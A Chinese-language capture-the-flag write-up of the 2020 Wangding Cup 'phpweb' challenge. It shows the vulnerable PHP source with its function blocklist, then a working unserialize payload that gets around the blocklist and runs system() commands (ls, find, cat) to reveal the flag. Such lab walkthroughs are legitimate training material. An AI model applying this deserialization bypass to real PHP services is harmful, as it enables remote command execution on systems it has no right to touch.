[網鼎杯 2020 朱雀組]phpweb 1

TazmiDev發表於2024-11-24
PHPWeb

[網鼎杯 2020 朱雀組]phpweb 1

開啟例項,發現是個php頁面,過了一會頁面報錯,發現引數func=date&p=Y-m-d h:i:s a

image-20241117112320052

看著像php傳遞函式執行的請求,嘗試修改func為phpinfo

func=phpinfo&p=Y-m-d h:i:s a

image-20241117112509504

可以看到引數被過濾了

採用highlight_file顯示當前頁面原始碼,由於這個頁面幾秒就重新整理一次,所以採用bp抓包

func=highlight_file&p=index.php

image-20241117115020937

可以看到頁面原始碼成功顯示,發現php程式碼

複製響應體,新建html檔案貼上(這邊如果在響應體裡面複製,會複製到一堆的標籤)

遮蔽定時器

image-20241117115431358

開啟html,複製php程式碼

<?php
$disable_fun = array("exec", "shell_exec", "system", "passthru", "proc_open", "show_source", "phpinfo", "popen", "dl", "eval", "proc_terminate", "touch", "escapeshellcmd", "escapeshellarg", "assert", "substr_replace", "call_user_func_array", "call_user_func", "array_filter", "array_walk", "array_map", "registregister_shutdown_function", "register_tick_function", "filter_var", "filter_var_array", "uasort", "uksort", "array_reduce", "array_walk", "array_walk_recursive", "pcntl_exec", "fopen", "fwrite", "file_put_contents");
function gettime($func, $p)
{
    $result = call_user_func($func, $p);
    $a = gettype($result);
    if ($a == "string") {
        return $result;
    } else {
        return "";
    }
}
class Test
{
    var $p = "Y-m-d h:i:s a";
    var $func = "date";
    function __destruct()
    {
        if ($this->func != "") {
            echo gettime($this->func, $this->p);
        }
    }
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];

if ($func != null) {
    $func = strtolower($func);
    if (!in_array($func, $disable_fun)) {
        echo gettime($func, $p);
    } else {
        die("Hacker...");
    }
}

image-20241117115533725

開始程式碼審計

可以在disable_fun陣列裡面,發現大量php函式被禁用

複製程式碼到vscode,CTRL+F搜尋serialize,未發現反/序列化函式被禁用,採用反序列化執行任意程式碼

image-20241117120515180

構造payload程式碼,採用system執行命令

<?php
class test
{
    var $p = "ls";
    var $func = "system";
}

$func = new test();
$res = serialize($func);
echo $res;

image-20241124084519815

獲得反序列化字串

O:4:"test":2:{s:1:"p";s:2:"ls";s:4:"func";s:6:"system";}

傳入func和p引數,成功遍歷當前目錄

func=unserialize&p=O:4:"test":2:{s:1:"p";s:2:"ls";s:4:"func";s:6:"system";}

image-20241124084845924

沒有發現flag,檢視根目錄

image-20241124085223180

image-20241124085244095

一樣沒有發現flag,選擇用find搜尋

func=unserialize&p=O:4:"test":2:{s:1:"p";s:18:"find / -name flag*";s:4:"func";s:6:"system";}

image-20241124085539808

發現與之不同的temp

image-20241124085528151

cat檢視

func=unserialize&p=O:4:"test":2:{s:1:"p";s:22:"cat /tmp/flagoefiu4r93";s:4:"func";s:6:"system";}

image-20241124085656278

成功拿到flag

image-20241124085801434

flag{f3b1f195-50f0-4d5b-8ce3-0d44d2ede1e2}

相關文章